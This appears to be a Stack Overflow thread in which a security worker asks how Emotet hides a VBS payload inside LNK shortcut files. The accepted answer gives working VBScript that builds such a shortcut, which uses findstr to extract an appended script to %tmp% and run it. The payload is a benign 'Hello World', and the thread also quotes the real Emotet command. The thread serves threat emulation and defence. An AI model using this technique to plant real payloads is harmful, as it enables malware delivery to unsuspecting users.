# Appending Data to LNK Shortcut File [Emotet TTP]

Tags: windows, powershell, security, malware, lnk

There has been a rise in the use of LNK shortcut files to deliver malware, in particular Emotet. Within the LNK file is a payload (usually a VBS script) that is found with `findstr.exe`. The payload is saved to a file and then run. For example, `findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”`

Security researchers say it is possible to append data to a LNK file without disrupting its functionality. So in the case of Emotet, a VBS script is being appended. I am attempting to create a benign LNK file that would mimic Emotet's activity.

How are these threat actors appending data to LNK shortcut files? I have crafted my own LNK file with PowerShell that simply opens `calc.exe`. With the use of a hex editor I attempted to add a simple script, but to no avail.

EDIT: To clarify, I work for a cyber security company and am trying to test my company's security posture through emulating this type of activity.

My question is based off the following article - [Rise of LNK Shortcut Files](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/)

Answer (score 1, accepted):

It looks like you can append any data you want to a .lnk file and Windows does not care. That being said, the .lnk binary file format is documented and you can [embed custom datablocks](https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nf-shobjidl_core-ishelllinkdatalist-adddatablock) if you really want the .lnk file to follow the spec. To do that it helps to use C or some other language that supports COM. Here I'm just using VBScript to generate the .lnk for simplicity.

GenerateLnk.vbs:

```
Set WShell = WScript.CreateObject("WScript.Shell")
Set FSO = WScript.CreateObject("Scripting.FileSystemObject")
lnkfilename = "SO_Vir_Test.lnk"
set lnk = WShell.CreateShortcut(FSO.BuildPath(FSO.GetParentFolderName(WScript.ScriptFullName), lnkfilename))
lnk.TargetPath = FSO.BuildPath(WShell.ExpandEnvironmentStrings("%windir%"), "system32\cmd.exe")
lnk.IconLocation = "shell32.dll,1" ' Why not :)
magic = "Ev1LStArTsH3re"
lnk.Arguments = "/C findstr """+magic+".*"" """+lnkfilename+""" > ""%tmp%\Evil.vbs""&wscript ""%tmp%\Evil.vbs"""
lnk.Save
WShell.Exec("cmd.exe /C >>"""+lnk+""" echo.") ' Newline to separate the script from the lnk data, otherwise findstr will include binary junk
WScript.Sleep(500) ' Hack to wait for the previous command, I'm sure there is a better way
WShell.Exec("cmd.exe /C >>"""+lnk+""" echo "+magic+"=1::on error resume next::WScript.Echo(""Hello World"")::WScript.Quit(0)")
```

Paste the code into a .vbs file and execute it to generate a .lnk shortcut. When you execute this shortcut it will launch cmd.exe and cmd.exe will execute `findstr "Ev1LStArTsH3re.*" "SO_Vir_Test.lnk" > "%tmp%\Evil.vbs"&wscript "%tmp%\Evil.vbs"`. Breaking this down, `findstr` will find the line that starts with our magic (`Ev1LStArTsH3re`) inside the .lnk and output that line to stdout. We have redirected stdout to a .vbs file in %temp%. After `findstr` is done we simply execute the .vbs file we just created. This .vbs file will just show a `MessageBox` but you could make it do something evil instead.

The big flaw with this exploit is that the user cannot rename the .lnk file before executing it! If the user renames the .lnk the `findstr` will fail and the whole thing falls flat on its face.

The other two examples in the McAfee blog you linked to simply executes some Powershell command and don't really do anything unusual with the .lnk file.

Answer (score 1):

**This isn't a *complete* solution** - it provides **background** information and eventually turned into a **roadmap to the *other* answers** here:

- To rule out a misconception (which I had): The exploit you're referring to is based on embedding / appending data when the LNK file (extension `.lnk`, a Windows shortcut file) is *constructed*, not when the LNK file is later *opened* by the users.
- That is, the malicious code is *already contained* in the LNK file, albeit *hidden* from the casual observer.
- *Opening* the LNK file - which requires explicit user action - runs a command that itself *appears* nondescript / harmless (`findstr ...`), but *extracts* the malicious code contained in the LNK file itself to a VBS file (`.vbs`, a VBScript) and *executes* the latter.

The article you link to doesn't discuss *how* the malicious code that is extracted to a VBS script is stored inside the LNK file, but there are two possibilities:

- [Keith Miller's answer](https://stackoverflow.com/a/73851055/45375) discusses the *binary file format* of LNK files, which supports embedding arbitrary user-defined data. [Anders](https://stackoverflow.com/users/3501/anders) states that the `ExtraData` field (section 2.5) is the logical choice, as it allows storing arbitrary data that  isn't visible in the Properties dialog / via the `WScript.Shell` COM API. You'll need to construct such LNK files *programmatically*, using a lower-level language that has access to all COM APIs, such as C/C++.
- [Anders' answer](https://stackoverflow.com/a/73854214/45375) shows that you can even more simply *append* data *in an unstructured manner* to an existing LNK file without breaking its functionality.

  - Anders' answer shows how to use VBScript to construct the LNK file, but it's even possible to use the GUI to manually create the LNK file and then use simple shell commands using `>>` (`cmd.exe`) / `Add-Content` (PowerShell) to append the malicious code.

Comment: Thanks, @Anders - I knew something didn't quite add up. I also misread the blog post, which doesn't really discuss _how_ the malicious code is embedded. +1 for your answer and, FWIW, I think it should be the accepted one. I've reworked this answer to in effect provide a roadmap to your answer and the other one, along with background information. I hope that still has some value.

Comment: Writing the .lnk with code is better than the UI. In the case of the icon, the UI will probably write the full path like c:\windows\system32\shell32.dll (and break if Windows is installed somewhere else). With my code it should only store a relative filename that Windows will find in %path%. For testing on your own machine, this will not matter of course.

Comment: Thanks, @Anders. Turns out that at least via the `WScript.Shell` COM API you cannot store mere file _names_ in the LNK file and have it resolved against `%PATH%` at runtime. However, what you can do is express the - invariably full - paths in terms of `cmd.exe` environment variables, such as `%windir%\System32\cmd.exe`, which makes for the most portable form based on full paths. There are some quirks around the Properties dialog, but from what I can tell you can set the properties in the same way as you can programmatically, at least with respect to the  `WScript.Shell` COM API.

Comment: The path, yes, it needs to be a full path but the shell link code will store it as a pidl with a special folder offset for system32 so that is not a problem. If you look at the file my code generates in a hex editor you will see that the icon path is just the filename.

Comment: @Anders: Good to know about the PIDL - does that work with other well-known folders too, such as the Desktop? Yes, the icon path can be a mere file name or a relative path, and it will be stored as such and resolved relative to the executable path. You can do specify such a name-only / relative-path value in the Properties dialog as well - you just have to click past a spurious warning about the file not being found; if you submit nonetheless, it works as intended.

Comment: @Anders, correction: I see that it only works with a name-only / relative path to a single image file, not in the form where you target a DLL with an index pointing to an images inside the DLL.

Comment: I don't know how well it does the PIDL mapping (0xA0000005=EXP_SPECIAL_FOLDER), it can do windir, system32, programfiles and appdata at least. Not sure if it does all of them. Vista added the 0xA000000B block that knows about well-known folders as well (those are GUIDS, not just a UINT16 like the special folders from Win95+).

Answer (score 1):

Go to this page:

- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943

Where you can download:

- [MS-SHLLINK]: Shell Link (.LNK) Binary File Format

The file format allows data to be included in structures/sections that are never revealed by the file's Properties dialog or any of the properties available to the com object created by `wscript.shell`.

Likely suspects:

> 1.7 Vendor-Extensible Fields
> A shell data source can extend the persistence format by storing custom data inside ItemID structure.
> The ItemIDs embedded in an IDList are in a format specified by the shell data sources that manage the ItemIDs. The ItemIDs are free to store whatever data is needed in this structure to uniquely identify the items in their namespace.
> The property store embedded in a link can be used to store property values in the shell link.

or perhaps:

> 2.4 StringData
> StringData refers to a set of structures that convey user interface and path identification information. The presence of these optional structures is controlled by LinkFlags (section 2.1.1) in the ShellLinkHeader (section 2.1).

or...

> 2.5 ExtraData
> ExtraData refers to a set of structures that convey additional information about a link target. These optional structures can be present in an extra data section that is appended to the basic Shell Link Binary File Format.

There's a lot to digest...Good luck!!!

Comment: 1.7 ItemIDs cannot really be used because it is part of the shortcut target. While people can make custom ItemIDs, this is in the context of namespace extensions and not a lnk file pointing to cmd.exe. 2.4 cannot be used because the only field you can change is NAME_STRING and it will be stored as UTF-16 which is harder to extract with findstr. All these fields can be seen by wscript.shell. 2.5 would be the place to store custom data if you want to follow the spec.

Comment: @Anders: Thank you for the clarification. Admittedly, the only thing I was sure of was the link, which I hope the OP finds useful. I used it to write some **PowerShell** code to parse `.lnk` files, but it's incomplete -- i.e. optional structures I've never encounted are still binary data -- haven't written the functions to interpret...

Answer (score 0):

In this attack scenario, using methods like `IShellLinkDataList::AddDataBlock` is not the most optimal choice. In real-world or red team environments, attackers typically directly use hex editors to compress binary or malicious script data into shortcuts. This makes it much easier for attackers to customize shortcut files.

You can try opening a .lnk file with a hex editor, then paste the binary/script data at the END OF THE FILE. Windows will still recognize this as a regular shortcut file. This allows you to execute findstr/find scripts to read the compressed script and execute it.

You can even use scripts like Python to achieve this by opening and appending the file in binary mode.